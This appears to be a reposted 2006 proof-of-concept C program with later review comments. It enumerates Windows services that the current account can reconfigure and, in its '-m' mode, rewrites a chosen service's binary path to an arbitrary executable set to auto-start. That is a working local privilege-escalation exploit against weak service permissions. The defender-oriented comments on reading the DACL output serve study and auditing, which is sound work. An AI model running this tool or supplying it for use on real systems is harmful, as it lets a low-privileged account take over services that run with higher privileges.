MS Windows Services Access List Checker / Modifier PoC
时间:2006-2-4 13:54:33 出处:网络 作者:未知 编辑:mervin 点击数:
void doFormatMessage( unsigned int dwLastErr );

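/*
 * Windows service permission checker / modifier (proof of concept).
 *
 *   -l                  try to open every enumerated service with
 *                       SERVICE_CHANGE_CONFIG and list the ones that open.
 *   -m SRVNAME NewPath  call ChangeServiceConfig() on SRVNAME with NewPath
 *                       as the binary path.
 *
 * Reading the -l output as a defender: a listed service has a DACL that
 * grants the calling account SERVICE_CHANGE_CONFIG.  For a non-administrative
 * account that is a misconfiguration, because the account can then redirect
 * the service's binary path while the service itself usually runs under a
 * more privileged account.  `sc sdshow <service>` displays the DACL and
 * `sc sdset` replaces it.
 *
 * Exit status is kept as in the original: 1 for the usage error and also on
 * the normal path, -1 for API failures, so it cannot be used to tell success
 * from a usage error.
 */
int main(int argc, char* argv[])
{
    /* Buffer sizes.  The enumeration size is the original's; 8192 is the
     * documented upper bound for a QUERY_SERVICE_CONFIG buffer (the original
     * 1024 failed on services with long paths or dependency lists). */
    enum { ENUM_BUF_SIZE = 65535, CONFIG_BUF_SIZE = 8192 };

    SC_HANDLE SCM = NULL;
    SC_HANDLE Svc = NULL;
    LPENUM_SERVICE_STATUS_PROCESS lpServices = NULL; /* stays NULL in -m mode */
    LPQUERY_SERVICE_CONFIG lpConfig = NULL;
    DWORD nSize = 0;
    DWORD nServicesReturned = 0;
    DWORD nResumeHandle = 0;
    DWORD dwServiceType;
    DWORD dwByteNeeded = 0;
    DWORD dwErr;
    DWORD n;
    int list_mode;
    unsigned int found = 0;

    printf(" Services Permissions checker\n");
    printf(" (c) 2006 Andres Tarasco - atarasco _at_ gmail.com\n\n");

    /* Accept exactly the two documented forms.  The original let argc==3 and
     * argc==5 through, which led to argv[3] being read as NULL or to extra
     * arguments being silently ignored. */
    list_mode = (argc == 2 && strcmp(argv[1], "-l") == 0);
    if (!list_mode && !(argc == 4 && strcmp(argv[1], "-m") == 0)) {
        printf("Usage:\n\t-l (list vulnerable services)\n");
        printf("\t-m SRVNAME NewPath (change the configuration for that service)\n");
        exit(1);
    }

    if (list_mode) {
        SCM = OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
    } else {
        SCM = OpenSCManager(NULL, NULL, STANDARD_RIGHTS_WRITE);
    }
    if (!SCM) {
        /* Capture the error before printf(), which may overwrite it. */
        dwErr = GetLastError();
        printf("OpenScManager FAILED\n");
        doFormatMessage(dwErr);
        exit(-1);
    }

    if (list_mode) {
        dwServiceType = SERVICE_WIN32 | SERVICE_DRIVER;

        /* LPTR zero-initialises the block, so no separate memset is needed
         * (the original memset only cleared sizeof(pointer) bytes anyway). */
        lpServices = (LPENUM_SERVICE_STATUS_PROCESS) LocalAlloc(LPTR, ENUM_BUF_SIZE);
        if (!lpServices) {
            printf("LocalAlloc Failed\n");
            CloseServiceHandle(SCM);
            exit(-1);
        }

        /* A single call with a fixed buffer: on hosts with more services than
         * fit, the call fails with ERROR_MORE_DATA and nothing is listed. */
        if (EnumServicesStatusEx(SCM, SC_ENUM_PROCESS_INFO,
                                 dwServiceType, SERVICE_STATE_ALL,
                                 (LPBYTE)lpServices, ENUM_BUF_SIZE,
                                 &nSize, &nServicesReturned,
                                 &nResumeHandle, NULL) == 0) {
            dwErr = GetLastError();
            printf("EnumServicesStatusEx FAILED\n");
            doFormatMessage(dwErr);
            LocalFree(lpServices);
            CloseServiceHandle(SCM);
            exit(-1);
        }

        for (n = 0; n < nServicesReturned; n++) {
            /* NOTE(review): SC_MANAGER_ENUMERATE_SERVICE is an SCM-object
             * right used here in a service-object access mask; the mask is
             * left exactly as the author wrote it so the set of reported
             * services does not change. */
            Svc = OpenService(SCM, lpServices[n].lpServiceName,
                              SERVICE_CHANGE_CONFIG | SC_MANAGER_ENUMERATE_SERVICE | GENERIC_READ);
            if (Svc == NULL) {
                continue; /* caller has no change-config right on this one */
            }

            found++;
            printf("[%s]\t\t%s\n", lpServices[n].lpServiceName, lpServices[n].lpDisplayName);
            printf("Status: 0x%lx\n",
                   (unsigned long)lpServices[n].ServiceStatusProcess.dwCurrentState);

            dwByteNeeded = 0;
            lpConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, CONFIG_BUF_SIZE);
            if (lpConfig == NULL) {
                printf("LocalAlloc Failed\n");
            } else if (QueryServiceConfig(Svc, lpConfig, CONFIG_BUF_SIZE, &dwByteNeeded) != 0) {
                printf("Path: %s\n\n", lpConfig->lpBinaryPathName);
            } else {
                doFormatMessage(GetLastError());
            }

            /* The original leaked both the config buffer and the service
             * handle on every iteration. */
            LocalFree(lpConfig);
            lpConfig = NULL;
            CloseServiceHandle(Svc);
            Svc = NULL;
        }
    } else {
        Svc = OpenService(SCM, argv[2], SERVICE_CHANGE_CONFIG | STANDARD_RIGHTS_WRITE);
        if (Svc != NULL) {
            /* Sets the binary path to argv[3], forces auto-start and
             * SERVICE_ERROR_IGNORE, and clears the dependency list (empty
             * string); every NULL argument means "leave unchanged".  On the
             * host this shows up as a change to the service's ImagePath
             * value under its Services registry key. */
            if (ChangeServiceConfig(
                    Svc,
                    SERVICE_NO_CHANGE,
                    SERVICE_AUTO_START,
                    SERVICE_ERROR_IGNORE,
                    argv[3],
                    NULL,
                    NULL,
                    "",
                    NULL,
                    NULL,
                    NULL) != 0) {
                printf("service modified =)\n");
            } else {
                printf("modification failed\n");
            }
            CloseServiceHandle(Svc);
            Svc = NULL;
        } else {
            printf("Unable to open Service %s\n", argv[2]);
        }
    }

    /* The summary only makes sense for -l; the original also printed
     * "No luck" after a successful -m. */
    if (list_mode) {
        if (found > 0) {
            printf("\n You were Lucky. %u services found\n", found);
        } else {
            printf("No luck\n");
        }
    }

    CloseServiceHandle(SCM);
    LocalFree(lpServices); /* NULL in -m mode; LocalFree ignores NULL */
    return(1);
}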




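/*
 * Print the system message text for a Win32 error code.
 *
 * dwLastErr: value previously obtained from GetLastError().
 *
 * Output format is "Error: ERRORCODE <code>: <message>" followed by a blank
 * line, as in the original.  The message is printed directly instead of
 * being copied through a fixed 512-byte stack buffer with sprintf(), which
 * could overflow on a long system message.
 */
void doFormatMessage( unsigned int dwLastErr ) {
    LPVOID lpMsgBuf = NULL;
    DWORD dwLen;

    /* FORMAT_MESSAGE_ALLOCATE_BUFFER makes FormatMessage allocate the
     * buffer and store its address through the lpBuffer argument, hence
     * the cast of &lpMsgBuf. */
    dwLen = FormatMessage(
        FORMAT_MESSAGE_ALLOCATE_BUFFER |
        FORMAT_MESSAGE_IGNORE_INSERTS |
        FORMAT_MESSAGE_FROM_SYSTEM,
        NULL,
        dwLastErr,
        MAKELANGID( LANG_NEUTRAL, SUBLANG_DEFAULT ),
        (LPTSTR) &lpMsgBuf,
        0,
        NULL );

    /* On failure nothing was allocated; the original went on to print and
     * free an uninitialised pointer. */
    if (dwLen == 0 || lpMsgBuf == NULL) {
        printf("Error: ERRORCODE %u: (no system message available)\n\n", dwLastErr);
        return;
    }

    /* Assumes an ANSI (non-UNICODE) build, like the rest of this file,
     * which passes char strings to the generic API names. */
    printf("Error: ERRORCODE %u: %s\n\n", dwLastErr, (char *)lpMsgBuf);
    LocalFree( lpMsgBuf );
}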